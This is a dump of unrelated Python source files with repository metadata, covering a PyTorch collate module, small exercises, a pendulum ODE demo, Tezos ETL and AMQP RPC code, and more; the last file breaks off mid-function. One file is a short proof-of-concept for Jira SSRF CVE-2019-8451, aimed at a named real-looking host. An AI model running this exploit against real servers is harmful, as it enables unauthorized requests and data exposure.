            self.lengths.append(len(sequence))
        # Labels are long here (RETAIN uses class indices), float elsewhere.
        self.labels = torch.as_tensor(labels, dtype=torch.long)

    def __len__(self):
        return len(self.labels)

    def __getitem__(self, index):
        # Returns (dense visit matrix, numeric covariates, label, sequence
        # length, visit-time ids).
        return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
               self.lengths[index], self.visits[index]
def pad(batch):
    """Collate function used with RETAIN and the vanilla Transformer.

    Each sample carries, in order: the visit sequence, the numeric
    covariates, the label, the true sequence length and the visit times.

    Parameters
    ----------
    batch : list of tuples
        Samples produced by the dataset.

    Returns
    -------
    list, Tensor
        Model inputs and the float32 target tensor.
    """
    seqs, num, targs, lengths, visits = zip(*batch)
    # Stack per-feature columns and transpose to (batch, n_features).
    features = torch.vstack(
        [torch.as_tensor(column, dtype=torch.float32) for column in zip(*num)]
    ).T
    visit_tensors = [torch.as_tensor(v, dtype=torch.long) for v in visits]
    inputs = [
        list(seqs),
        features,
        torch.as_tensor(lengths, dtype=torch.long),
        visit_tensors,
    ]
    return inputs, torch.as_tensor(targs, dtype=torch.float32)
def distill_pad(batch):
    """Collate function used when distilling a teacher model.

    Each sample carries, in order: the visit sequence, the numeric
    covariates, the teacher prediction, the label, the true sequence
    length and the visit times.

    Parameters
    ----------
    batch : list of tuples
        Samples produced by a ``DistillDataset``.

    Returns
    -------
    list, list
        Model inputs and a pair [labels, teacher predictions].
    """
    seqs, num, preds, targs, lengths, visits = zip(*batch)
    # Stack per-feature columns and transpose to (batch, n_features).
    features = torch.vstack(
        [torch.as_tensor(column, dtype=torch.float32) for column in zip(*num)]
    ).T
    visit_tensors = [torch.as_tensor(v, dtype=torch.long) for v in visits]
    inputs = [
        list(seqs),
        features,
        torch.as_tensor(lengths, dtype=torch.long),
        visit_tensors,
    ]
    labels = [
        torch.as_tensor(targs, dtype=torch.float32),
        torch.as_tensor(preds, dtype=torch.float32),
    ]
    return inputs, labels
| 40.573892 | 123 | 0.611728 | 14,468 | 0.878286 | 0 | 0 | 2,053 | 0.124628 | 0 | 0 | 3,112 | 0.188915 |
441ded704ad1f58469e577a15c12086c94e18f8c | 1,104 | py | Python | Python3-world2/ex068.py | samirsaravia/Python_101 | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | [
"MIT"
] | null | null | null | Python3-world2/ex068.py | samirsaravia/Python_101 | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | [
"MIT"
] | 1 | 2020-10-16T23:26:41.000Z | 2020-10-16T23:26:41.000Z | Python3-world2/ex068.py | samirsaravia/Python_101 | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | [
"MIT"
] | null | null | null | import random
# "Par ou ímpar" (odds-and-evens) game: the player keeps winning rounds
# until the parity of (player's number + computer's number) does not match
# the player's pick, which ends the game.
title = 'par ou ímpar'.upper()
print('~~' * 10)
print(f'\033[7;30m{title:^20}\033[m')  # inverted-video title banner
print('~~' * 10)
# poi = "par ou impar": parity of the sum ('par' = even, 'ímpar' = odd)
# vop = "vitoria ou perda": colored win/loss word for the result message
poi = vop = ''
cont = 0  # number of rounds played
while True:
    cont += 1
    escolha_numero = int(input('Digite um número: '))  # player's number
    escolha_parinpar = str(input('Par ou Impar[P/I]: ')).strip().upper()[0]  # player's parity pick
    en = escolha_numero
    epi = escolha_parinpar
    # npc = "numero do pc": the computer's random number
    npc = random.randint(1, 100)
    soma = npc + en
    if soma % 2 == 0:
        poi = 'par'
    else:
        poi = 'ímpar'
    # Player wins when the picked parity matches the parity of the sum.
    if soma % 2 == 0 and epi in 'Pp' or soma % 2 != 0 and epi in 'Ii':
        vop = '\033[1;32mganhou\033[m'
    else:
        vop = '\033[1;31mperdeu\033[m'
        break  # first loss ends the game
    print(f'O numero escolhido pelo pc foi : {npc}')
    print(f'A soma foi: \033[1;33m{soma}\033[m')
    print(f'Você {vop}, deu \033[1;33m{poi}\033[m')
    print('---' * 10)
print(f'O numero escolhido pelo pc foi : {npc}')
print(f'A soma foi: \033[1;33m{soma}\033[m')
if cont > 1:
    print(f'Depois de {cont - 1} vezes seguidas, ', end='')
print(f'Você {vop}, deu \033[1;33m{poi}')
| 29.837838 | 75 | 0.567935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 509 | 0.458972 |
441ec5d59d9d3a65610332b574a805f37375ef36 | 730 | py | Python | 2018_01__Python_introduction_for_MATLAB_users__at_Supelec/examples/Solving_a_2D_Ordinary_Differential_Equation.py | pierre-haessig/slides | b16071df486b1d093976c1670e64debd98863a67 | [
"MIT"
] | 10 | 2016-07-06T13:25:11.000Z | 2022-02-23T14:35:24.000Z | 2018_01__Python_introduction_for_MATLAB_users__at_Supelec/examples/Solving_a_2D_Ordinary_Differential_Equation.py | pierre-haessig/slides | b16071df486b1d093976c1670e64debd98863a67 | [
"MIT"
] | 29 | 2017-07-12T16:14:04.000Z | 2021-02-15T04:30:39.000Z | 2018_01__Python_introduction_for_MATLAB_users__at_Supelec/examples/Solving_a_2D_Ordinary_Differential_Equation.py | pierre-haessig/slides | b16071df486b1d093976c1670e64debd98863a67 | [
"MIT"
] | 5 | 2018-10-09T08:45:14.000Z | 2021-09-07T21:01:23.000Z | #! /usr/bin/env python
# -*- coding: utf8 -*-
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint # use Runge-Kutta 4
def pend(y, t, b, c):
    """Right-hand side of the damped pendulum ODE.

    For state y = [theta, omega], returns dy/dt = [omega,
    -b*omega - c*sin(theta)], where b weights the omega (damping) term
    and c weights the sin(theta) term.
    """
    theta, omega = y[0], y[1]
    return np.array([omega, -b * omega - c * np.sin(theta)])
b, c = 0.25, 5.0  # tuple assignment: b weights omega, c weights sin(theta) in pend()
y0 = np.array([np.pi - 0.1, 0.0])  # initial state: near-inverted pendulum, at rest
t = np.linspace(0, 10, 101)  # on [0,10] with 101 points
# Integrate with LSODA via odeint; sol columns are theta(t) and omega(t).
sol = odeint(pend, y0, t, args=(b, c))
plt.plot(t, sol[:, 0], 'b', label=r'$\theta(t)$')  # blue
plt.plot(t, sol[:, 1], 'g', label=r'$\omega(t)$')  # green
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
# Save the figure before showing it (show() may clear the canvas).
plt.savefig("figures/Pendulum_solution.png")
plt.show()
| 27.037037 | 80 | 0.617808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 292 | 0.4 |
441fbe95d0f4a6ebbd262b36d8e02ea09ad5d0b7 | 417 | py | Python | learning/challenge/challenge7.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 2 | 2019-06-23T07:17:30.000Z | 2019-07-06T15:15:42.000Z | learning/challenge/challenge7.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | null | null | null | learning/challenge/challenge7.py | Nephrin/Tut | 9454be28fd37c155d0b4e97876196f8d33ccf8e5 | [
"Apache-2.0"
] | 1 | 2019-06-23T07:17:43.000Z | 2019-06-23T07:17:43.000Z | # Arithmetic progression
# A + (A+B) + (A+2B) + (A+3B) + ... + (A+(C-1)B))
def main():
    """Read N test cases of 'A B C' and print, for each, the sum of the
    first C terms of the arithmetic progression starting at A with step B.
    """
    n_cases = int(input("data:\n"))
    answers = []
    for _ in range(n_cases):
        a, b, c = (int(token) for token in input().split(" "))
        answers.append(sum(a + b * k for k in range(c)))
    print("\nanswer:")
    for answer in answers:
        print(answer, end=" ")


main()
| 23.166667 | 50 | 0.402878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.242206 |
441fc3bc46c6ecde088567b44799291211ec1438 | 480 | py | Python | test-app/test_app/core/tests/test_image.py | dchiquito/girder-pytest-pyppeteer | 7b287ed393735a14c89bd8934d61e33d38a658d4 | [
"Apache-2.0"
] | 5 | 2020-07-23T14:40:17.000Z | 2021-01-14T09:07:43.000Z | test-app/test_app/core/tests/test_image.py | dchiquito/girder-pytest-pyppeteer | 7b287ed393735a14c89bd8934d61e33d38a658d4 | [
"Apache-2.0"
] | 49 | 2020-07-20T15:25:28.000Z | 2021-03-12T22:09:07.000Z | test-app/test_app/core/tests/test_image.py | dchiquito/girder-pytest-pyppeteer | 7b287ed393735a14c89bd8934d61e33d38a658d4 | [
"Apache-2.0"
] | 3 | 2020-10-07T14:08:53.000Z | 2021-03-12T22:01:19.000Z | import pytest
def test_image_checksum(image_factory):
    """Computing a checksum populates the ``checksum`` field."""
    # "build" (rather than "create") keeps the object out of the database.
    built_image = image_factory.build()
    built_image.compute_checksum()
    assert built_image.checksum is not None
@pytest.mark.django_db
def test_image_rest_retrieve(api_client, image):
    """The image detail endpoint returns the stored image's name."""
    response = api_client.get(f'/api/v1/images/{image.id}/')
    assert response.status_code == 200
    # .data holds the already-deserialized payload, avoiding JSON parsing.
    assert response.data['name'] == image.name
441fd066a3b9ceec8854e7357e20db9ea179837b | 1,785 | py | Python | rem/_dummy_fork_locking.py | heni/rem | 00caa0e2e6b0bd0091e8290c1e11884c8c45d347 | [
"MIT"
] | 14 | 2015-03-25T08:31:02.000Z | 2022-03-31T10:58:40.000Z | rem/_dummy_fork_locking.py | heni/rem | 00caa0e2e6b0bd0091e8290c1e11884c8c45d347 | [
"MIT"
] | 3 | 2015-02-07T16:00:01.000Z | 2015-10-07T11:39:27.000Z | rem/_dummy_fork_locking.py | heni/rem | 00caa0e2e6b0bd0091e8290c1e11884c8c45d347 | [
"MIT"
] | 6 | 2015-02-06T16:43:05.000Z | 2020-02-18T13:43:31.000Z | import threading
__all__ = ["acquire_fork", "acquire_lock", "release_fork", "release_lock"]
class TwoExclusiveResourcesDispatcher(object):
    """Coordinates two mutually exclusive resources.

    Any number of holders may share one resource concurrently, but a
    resource can only be acquired while the *other* resource has zero
    holders. Used below to make fork() and ordinary locking mutually
    exclusive.
    """
    def __init__(self):
        # Current number of holders of each resource.
        self.FirstResourceUsage = 0
        self.SecondResourceUsage = 0
        self.lock = threading.Lock()
        # Signalled when the first resource drops to zero holders.
        self.FirstResourceEvent = threading.Condition(self.lock)
        # Signalled when the second resource drops to zero holders.
        self.SecondResourceEvent = threading.Condition(self.lock)

    def AcquireFirstResource(self):
        # Wait until the second resource is fully released, then register
        # as a holder of the first one.
        with self.lock:
            while self.SecondResourceUsage > 0:
                self.SecondResourceEvent.wait()
            self.FirstResourceUsage += 1

    def ReleaseFirstResource(self):
        with self.lock:
            if self.FirstResourceUsage <= 0:
                raise RuntimeError("try to release already released object")
            self.FirstResourceUsage -= 1
            # Wake every waiter for the first resource once it is free.
            if self.FirstResourceUsage == 0:
                self.FirstResourceEvent.notifyAll()

    def AcquireSecondResource(self):
        # Mirror of AcquireFirstResource for the second resource.
        with self.lock:
            while self.FirstResourceUsage > 0:
                self.FirstResourceEvent.wait()
            self.SecondResourceUsage += 1

    def ReleaseSecondResource(self):
        with self.lock:
            if self.SecondResourceUsage <= 0:
                raise RuntimeError("try to release already released object")
            self.SecondResourceUsage -= 1
            # Wake every waiter for the second resource once it is free.
            if self.SecondResourceUsage == 0:
                self.SecondResourceEvent.notifyAll()
# Module-level singleton shared by the acquire/release helpers below.
_ForkLockDispatcher = TwoExclusiveResourcesDispatcher()


def acquire_fork():
    # fork is the "first" resource: blocks while any lock is held.
    _ForkLockDispatcher.AcquireFirstResource()


def release_fork():
    _ForkLockDispatcher.ReleaseFirstResource()


def acquire_lock():
    # locks are the "second" resource: blocks while a fork is in progress.
    _ForkLockDispatcher.AcquireSecondResource()


def release_lock():
    _ForkLockDispatcher.ReleaseSecondResource()
| 30.254237 | 76 | 0.664986 | 1,355 | 0.759104 | 0 | 0 | 0 | 0 | 0 | 0 | 136 | 0.07619 |
4423940e7bf16fa7a158c1ac06a6349871fe59a2 | 2,410 | py | Python | my/core/error.py | thetomcraig/HPI | 5eecd8721dc0cbfc68040106bb7b540b1567dff3 | [
"MIT"
] | null | null | null | my/core/error.py | thetomcraig/HPI | 5eecd8721dc0cbfc68040106bb7b540b1567dff3 | [
"MIT"
] | null | null | null | my/core/error.py | thetomcraig/HPI | 5eecd8721dc0cbfc68040106bb7b540b1567dff3 | [
"MIT"
] | null | null | null | """
Various error handling helpers
See https://beepb00p.xyz/mypy-error-handling.html#kiss for more detail
"""
from itertools import tee
from typing import Union, TypeVar, Iterable, List, Tuple, Type
T = TypeVar('T')
E = TypeVar('E', bound=Exception)  # TODO make covariant?

# A result that is either a value of type T or an error of type E.
ResT = Union[T, E]

# Common case: a value of type T or any Exception.
Res = ResT[T, Exception]
def unwrap(res: Res[T]) -> T:
    """Return the value held in *res*, raising it instead if it is an exception."""
    if isinstance(res, Exception):
        raise res
    return res
def echain(ex: E, cause: Exception) -> E:
    """Chain *cause* onto *ex* (as ``raise ex from cause`` would) and return *ex*."""
    ex.__cause__ = cause
    return ex
def split_errors(l: Iterable[ResT[T, E]], ET: Type[E]) -> Tuple[Iterable[T], Iterable[E]]:
    """Split a mixed stream into (values, errors of type *ET*) lazily.

    Both returned iterables are generators backed by ``itertools.tee``, so
    the input is consumed at most once per branch.
    """
    # TODO would be nice to have ET=Exception default?
    value_it, error_it = tee(l)
    # TODO ugh, not sure if I can reconcile type checking and runtime and convince mypy that ET and E are the same type?
    values: Iterable[T] = (
        item  # type: ignore[misc]
        for item in value_it
        if not isinstance(item, ET)
    )
    errors: Iterable[E] = (
        item
        for item in error_it
        if isinstance(item, ET)
    )
    # TODO would be interesting to be able to have yield statement anywehere in code
    # so there are multiple 'entry points' to the return value
    return (values, errors)
def sort_res_by(items: Iterable[ResT], key) -> List[ResT]:
    """Sort the values in *items* by *key*, keeping the errors attached.

    Each run of exceptions travels with the first regular value that
    follows it in the original stream; exceptions after the last value
    are appended at the very end.
    """
    pending: List = []
    grouped = []
    for item in items:
        if isinstance(item, Exception):
            pending.append(item)
        else:
            grouped.append((item, pending))
            pending = []

    ordered: List[ResT] = []
    for value, errors in sorted(grouped, key=lambda pair: key(pair[0])):
        ordered.extend(errors)
        ordered.append(value)
    # Trailing errors (no value followed them) go last.
    ordered.extend(pending)
    return ordered
def test_sort_res_by() -> None:
    """Errors stay attached to the value that followed them after sorting."""
    class Exc(Exception):
        def __eq__(self, other):
            return self.args == other.args

    ress = [Exc('first'), Exc('second'), 5, 3, Exc('xxx'), 2, 1, Exc('last')]

    results = sort_res_by(ress, lambda x: x)  # type: ignore
    assert results == [1, Exc('xxx'), 2, 3, Exc('first'), Exc('second'), 5, Exc('last')]

    # A trailing value with no preceding errors picks up the old trailing error.
    results2 = sort_res_by(ress + [0], lambda x: x)  # type: ignore
    assert results2 == [Exc('last'), 0] + results[:-1]
| 24.1 | 120 | 0.573444 | 97 | 0.040249 | 0 | 0 | 0 | 0 | 0 | 0 | 693 | 0.287552 |
4426bbfc28bdebbc507707d96ca993bfc6cb31e2 | 1,158 | py | Python | Jira/CVE-2019-8451/__init__.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Jira/CVE-2019-8451/__init__.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Jira/CVE-2019-8451/__init__.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/
def ssrf_poc(url, ssrf_url):
if url[-1] == '/':
url = url[:-1]
else:
url = url
vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Atlassian-Token": "no-check",
"Connection": "close"
}
r = requests.get(url=vuln_url, headers=headers)
if r.status_code == 200 and 'set-cookie' in r.content:
print "\n>>>>Send poc Success!\n"
print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
print "\n>>>>vuln_url= " + vuln_url + '\n'
print r.content
else:
print "No Vuln Exit!"
if __name__ == "__main__":
while True:
print
ssrf_url = raw_input(">>>>SSRF URL: ")
url = "https://jira.liulishuo.work"
ssrf_poc(url, ssrf_url)
| 28.95 | 112 | 0.585492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 561 | 0.484456 |
442b82682f3eee1189a613f243e844bcbfce1414 | 62 | py | Python | tests/__init__.py | NickolasHKraus/statikos | 7d098760caa2ae8969801249c8c4761f02fd2372 | [
"MIT"
] | null | null | null | tests/__init__.py | NickolasHKraus/statikos | 7d098760caa2ae8969801249c8c4761f02fd2372 | [
"MIT"
] | null | null | null | tests/__init__.py | NickolasHKraus/statikos | 7d098760caa2ae8969801249c8c4761f02fd2372 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Unit test package for statikos."""
| 20.666667 | 37 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.967742 |
442cb0c494deec67f842f872720e741951f3f855 | 867 | py | Python | lib/googlecloudsdk/sql/tools/ssl_certs/__init__.py | bopopescu/google-cloud-sdk | b34e6a18f1e89673508166acce816111c3421e4b | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/sql/tools/ssl_certs/__init__.py | bopopescu/google-cloud-sdk | b34e6a18f1e89673508166acce816111c3421e4b | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/sql/tools/ssl_certs/__init__.py | bopopescu/google-cloud-sdk | b34e6a18f1e89673508166acce816111c3421e4b | [
"Apache-2.0"
] | 1 | 2020-07-24T20:04:47.000Z | 2020-07-24T20:04:47.000Z | # Copyright 2013 Google Inc. All Rights Reserved.
"""Provide commands for managing SSL certificates of Cloud SQL instances."""
from googlecloudsdk.calliope import base
class SslCerts(base.Group):
  """Provide commands for managing SSL certificates of Cloud SQL instances.

  Provide commands for managing SSL certificates of Cloud SQL instances:
  creating, deleting, listing, and getting information about certificates.
  """

  @staticmethod
  def Args(parser):
    """Args is called by calliope to gather arguments for this command.

    Args:
      parser: An argparse parser that you can use it to add arguments that go
        on the command line after this command. Positional arguments are
        allowed.
    """
    parser.add_argument(
        '--instance', '-i', required=True, help='Cloud SQL instance ID.')
442f2755025e74454cf096f990e2bed69c6dc5a7 | 5,981 | py | Python | SciDataTool/GUI/WVectorSelector/WVectorSelector.py | TinaTabo/SciDataTool | a1a51b104248d3e6d07006f2c3f2806b4589624e | [
"Apache-2.0"
] | null | null | null | SciDataTool/GUI/WVectorSelector/WVectorSelector.py | TinaTabo/SciDataTool | a1a51b104248d3e6d07006f2c3f2806b4589624e | [
"Apache-2.0"
] | null | null | null | SciDataTool/GUI/WVectorSelector/WVectorSelector.py | TinaTabo/SciDataTool | a1a51b104248d3e6d07006f2c3f2806b4589624e | [
"Apache-2.0"
] | null | null | null | from PySide2.QtWidgets import QWidget
from SciDataTool.GUI.WVectorSelector.Ui_WVectorSelector import Ui_WVectorSelector
from PySide2.QtCore import Signal
from PySide2.QtGui import QStandardItem
# Maps the human-readable component labels shown in the combobox to the
# component keys stored in a VectorField.
COMP_DICT = {
    "radial": "radial",
    "circumferential": "tangential",
    "axial": "axial",
    "x-axis component": "comp_x",
    "y-axis component": "comp_y",
    "z-axis component": "comp_z",
}

# Inverse mapping: VectorField component key -> combobox label.
REV_COMP_DICT = {
    "radial": "radial",
    "tangential": "circumferential",
    "axial": "axial",
    "comp_x": "x-axis component",
    "comp_y": "y-axis component",
    "comp_z": "z-axis component",
}
class WVectorSelector(Ui_WVectorSelector, QWidget):
    """Widget to select how to export the data"""

    # Emitted whenever the user selects a different vector component.
    refreshComponent = Signal()

    def __init__(self, parent=None):
        """Initialize the UI and linking buttons to their methods

        Parameters
        ----------
        self : WExport
            a WVectorSelector object
        parent : QWidget
            The parent widget
        """
        # Build the interface according to the .ui file
        QWidget.__init__(self, parent=parent)
        self.setupUi(self)

        self.c_component.currentTextChanged.connect(self.update_needed)
        # The referential selector is currently unused, so it is hidden.
        self.c_referential.hide()
        self.in_referential.hide()
        # self.c_referential.currentTextChanged.connect(self.update_needed)

        # Currently selected component key (None until a selection is made).
        self.component_selected = None
        # Selectable component labels (headers excluded), filled in update().
        self.component_list = list()

    def get_component_selected(self):
        """Getting the component selected

        Returns the VectorField component key for the current combobox label.

        Parameters
        ----------
        self : WExport
            a WVectorSelector object
        """
        return COMP_DICT[self.c_component.currentText()]

    def set_component(self, component_selected):
        """Method that set the component selected according to the input of the user (auto-plot)

        Parameters
        ----------
        self : DDataPlotter
            a DDataPlotter object
        component_selected : str
            Component to select
        """
        # Setting the combobox with the right component
        if component_selected in self.component_list:
            self.c_component.setCurrentIndex(
                self.component_list.index(component_selected)
            )
        else:
            # Fall back to the default component (index 1; index 0 is a
            # disabled section header).
            print(
                "WARNING : Trying to set the vector to "
                + component_selected
                + " a component which is not available. Setting to default component"
            )
            self.c_component.setCurrentIndex(1)

    def update(self, data):
        """Updating the combobox according to the components store in the VectorField

        Parameters
        ----------
        self : WExport
            a WVectorSelector object
        data : VectorField
            the object that we want to plot
        """
        comp_stored = data.components.keys()
        # Block signals while rebuilding the list so update_needed does not fire.
        self.blockSignals(True)
        self.c_component.clear()
        self.c_component.addItems([REV_COMP_DICT[comp] for comp in comp_stored])

        model = self.c_component.model()
        if "radial" in comp_stored or "tangential" in comp_stored:
            # Insert a bold, disabled "Polar coordinates" section header on top.
            item = QStandardItem("Polar coordinates")
            font = item.font()
            font.setBold(True)
            item.setFont(font)
            item.setEnabled(False)
            model.insertRow(0, item)

            # If the field can be converted, also offer cartesian components
            # under their own section header.
            try:
                data.to_xyz()
                item = QStandardItem("Cartesian coordinates")
                font = item.font()
                font.setBold(True)
                item.setFont(font)
                item.setEnabled(False)
                model.insertRow(self.c_component.count(), item)
                self.c_component.addItem("x-axis component")
                self.c_component.addItem("y-axis component")
                if "axial" in comp_stored:
                    self.c_component.addItem("z-axis component")
            except:
                pass

        elif "comp_x" in comp_stored or "comp_y" in comp_stored:
            # Mirror case: stored components are cartesian.
            item = QStandardItem("Cartesian coordinates")
            font = item.font()
            font.setBold(True)
            item.setFont(font)
            item.setEnabled(False)
            model.insertRow(0, item)

            # If the field can be converted, also offer polar components.
            try:
                data.to_rphiz()
                item = QStandardItem("Polar coordinates")
                font = item.font()
                font.setBold(True)
                item.setFont(font)
                item.setEnabled(False)
                model.insertRow(self.c_component.count(), item)
                self.c_component.addItem("radial")
                self.c_component.addItem("circumferential")
                if "comp_z" in comp_stored:
                    self.c_component.addItem("axial")
            except:
                pass

        # Recovering all the components available after the update
        # (section headers are excluded from the selectable list)
        self.component_list = [
            self.c_component.itemText(i)
            for i in range(self.c_component.count())
            if self.c_component.itemText(i)
            not in ["Polar coordinates", "Cartesian coordinates"]
        ]

        # Modifying the width of the dropdown list to make sure that all the element are readable
        component_list = [
            self.c_component.itemText(i) for i in range(self.c_component.count())
        ]
        width_drop_down = max([len(ac) for ac in component_list]) * 6
        self.c_component.view().setMinimumWidth(width_drop_down)

        # Index 0 is a disabled header, so select the first real component.
        self.c_component.setCurrentIndex(1)
        self.blockSignals(False)

    def update_needed(self):
        """Emit a signal when the component must be changed

        Parameters
        ----------
        self : WExport
            a WVectorSelector object
        """
        # if self.c_component.currentText() in [
        #     "Polar coordinates",
        #     "Cartesian coordinates",
        # ]:
        #     self.c_component.setCurrentIndex(self.c_component.currentIndex() + 1)

        self.refreshComponent.emit()
| 32.68306 | 97 | 0.582177 | 5,375 | 0.898679 | 0 | 0 | 0 | 0 | 0 | 0 | 2,227 | 0.372346 |
44306ec0cf33d83c853874a333ccf8829c102184 | 2,914 | py | Python | tezosetl/jobs/export_job.py | blockchain-etl/tezos-etl | ddc5ddb129f1289afd5c56c54ba4607d274b61de | [
"MIT"
] | 7 | 2020-06-07T11:28:00.000Z | 2022-01-17T19:07:06.000Z | tezosetl/jobs/export_job.py | blockchain-etl/tezos-etl | ddc5ddb129f1289afd5c56c54ba4607d274b61de | [
"MIT"
] | 1 | 2021-05-13T01:26:22.000Z | 2021-05-23T12:26:42.000Z | tezosetl/jobs/export_job.py | blockchain-etl/tezos-etl | ddc5ddb129f1289afd5c56c54ba4607d274b61de | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2020 Evgeny Medvedev, evge.medvedev@gmail.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from tezosetl.mappers.balance_update_mapper import map_balance_updates
from tezosetl.mappers.block_mapper import map_block
from tezosetl.mappers.operation_mapper import map_operations
from tezosetl.service.tezos_service import TezosService
from blockchainetl_common.executors.batch_work_executor import BatchWorkExecutor
from blockchainetl_common.jobs.base_job import BaseJob
from blockchainetl_common.utils import validate_range
# Exports blocks, balance updates and operations
class ExportJob(BaseJob):
    """Job exporting Tezos blocks, balance updates and operations for a
    block range [start_block, end_block], fanned out over a batch executor.
    """

    def __init__(
            self,
            start_block,
            end_block,
            tezos_rpc,
            max_workers,
            item_exporter,
            batch_size=1):
        # Fails fast on an invalid/reversed block range.
        validate_range(start_block, end_block)
        self.start_block = start_block
        self.end_block = end_block
        self.item_exporter = item_exporter
        self.tezos_service = TezosService(tezos_rpc)
        self.batch_work_executor = BatchWorkExecutor(batch_size, max_workers)

    def _start(self):
        # Open the exporter before any batch is processed.
        self.item_exporter.open()

    def _export(self):
        block_range = range(self.start_block, self.end_block + 1)
        self.batch_work_executor.execute(
            block_range,
            self._export_batch,
            total_items=self.end_block - self.start_block + 1,
        )

    def _export_batch(self, block_number_batch):
        # For every fetched block: export the block itself, then its
        # balance updates and operations.
        for response in self.tezos_service.get_blocks(block_number_batch):
            block = map_block(response)
            self.item_exporter.export_item(block)
            self.item_exporter.export_items(map_balance_updates(block, response))
            self.item_exporter.export_items(map_operations(block, response))

    def _end(self):
        self.batch_work_executor.shutdown()
        self.item_exporter.close()
4431cc070b5b72f9b1711e84d06659e38998a2d7 | 3,066 | py | Python | examples/amq/rpc/rpc-client.py | JohnSitarski/gestalt | 119bc0f1c1c8a9ad1919347573d25f1c502737dc | [
"MIT"
] | 8 | 2019-07-25T08:33:18.000Z | 2021-05-09T23:25:55.000Z | examples/amq/rpc/rpc-client.py | JohnSitarski/gestalt | 119bc0f1c1c8a9ad1919347573d25f1c502737dc | [
"MIT"
] | 1 | 2020-01-07T23:08:16.000Z | 2020-01-08T03:20:53.000Z | examples/amq/rpc/rpc-client.py | JohnSitarski/gestalt | 119bc0f1c1c8a9ad1919347573d25f1c502737dc | [
"MIT"
] | 3 | 2019-09-17T12:00:11.000Z | 2021-05-09T23:26:06.000Z | import argparse
import asyncio
import logging
import random
from aio_pika.exceptions import DeliveryError
from gestalt.amq.requester import Requester
from gestalt.serialization import CONTENT_TYPE_JSON
from gestalt.runner import run
logger = logging.getLogger(__name__)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="AMQP RPC Client Example")
parser.add_argument(
"--amqp-url", metavar="<url>", type=str, default=None, help="The AMQP URL"
)
parser.add_argument(
"--exchange-name",
metavar="<name>",
type=str,
default="",
help="The AMQP exchange name. Defaults to a empty string which is the default exchange.",
)
parser.add_argument(
"--service-name",
metavar="<pattern>",
type=str,
default="clock-service",
help="The service name. Defaults to 'clock-service'.",
)
parser.add_argument(
"--log-level",
type=str,
choices=["debug", "info", "error"],
default="error",
help="Logging level. Default is 'error'.",
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)s.%(msecs)03.0f [%(levelname)s] [%(name)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=getattr(logging, args.log_level.upper()),
)
requester = Requester(
amqp_url=args.amqp_url,
exchange_name=args.exchange_name,
service_name=args.service_name,
serialization=CONTENT_TYPE_JSON,
)
async def message_requester(r: Requester) -> None:
""" Generate a new request message, in various formats, and publish it """
counter = 0
while True:
counter += 1
request_msg = dict(sequence_number=counter, utc=True)
# For demonstration purposes randomly choose to use an invalid
# service name to show that the message gets returned and raises
# a DeliveryError exception.
service_name = (
r.service_name if random.random() < 0.8 else "invalid_service_name"
)
try:
logger.info(f"Sending request {request_msg} to {service_name}")
response_msg = await r.request(
request_msg, expiration=2, service_name=service_name
)
logger.info(f"Received response: {response_msg}")
except asyncio.TimeoutError as exc:
logger.info(f"Request was timed-out: {exc}")
except asyncio.CancelledError as exc:
logger.info(f"Request was cancelled: {exc}")
except DeliveryError as exc:
